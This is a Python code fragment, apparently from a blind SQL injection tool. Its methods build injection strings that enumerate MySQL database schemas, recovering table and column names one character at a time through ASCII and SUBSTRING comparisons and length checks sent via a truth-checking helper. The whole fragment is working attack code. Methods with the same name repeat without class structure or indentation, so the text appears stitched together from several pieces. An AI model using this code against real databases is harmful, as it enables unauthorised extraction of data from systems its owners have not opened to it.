def test_character(self, character, position, operation=">="):
injection_string = "(SELECT count(*) FROM (SELECT TABLE_SCHEMA,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=%s LIMIT %d,1) " \
"as temp where ASCII(SUBSTRING(TABLE_NAME, %d, 1))%s%d)" % \
(core.char_array(self.database), self.index - 1, position, operation, character)
return core.check_truth(injection_string)
def check_count(self, count, operation=">="):
injection_string = "(SELECT count(*) from information_schema.TABLES where TABLE_SCHEMA=%s)%s%d" %\
(core.char_array(self.database), operation, count)
return core.check_truth(injection_string)
def test_character(self, character, position, operation=">="):
injection_string = "(SELECT count(*) FROM (SELECT TABLE_SCHEMA,TABLE_NAME, COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=%s and TABLE_NAME=%s ORDER BY ORDINAL_POSITION LIMIT %d,1) " \
"as temp where ASCII(SUBSTRING(COLUMN_NAME, %d, 1))%s%d)" % \
(core.char_array(self.database), core.char_array(self.table), self.index - 1, position, operation, character)
return core.check_truth(injection_string)
def check_count(self, count, operation=">="):
injection_string = "(SELECT count(*) FROM (SELECT TABLE_SCHEMA,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=%s LIMIT %d,1) " \
"as temp where length(TABLE_NAME)%s%d)" %\
(core.char_array(self.database), self.index - 1, operation, count)
return core.check_truth(injection_string)
def check_count(self, count, operation=">="):
injection_string = "(SELECT count(*) FROM (SELECT TABLE_SCHEMA,TABLE_NAME, COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=%s and TABLE_NAME=%s ORDER BY ORDINAL_POSITION LIMIT %d,1) " \
"as temp where length(COLUMN_NAME)%s%d)" %\
(core.char_array(self.database), core.char_array(self.table), self.index - 1, operation, count)
return core.check_truth(injection_string)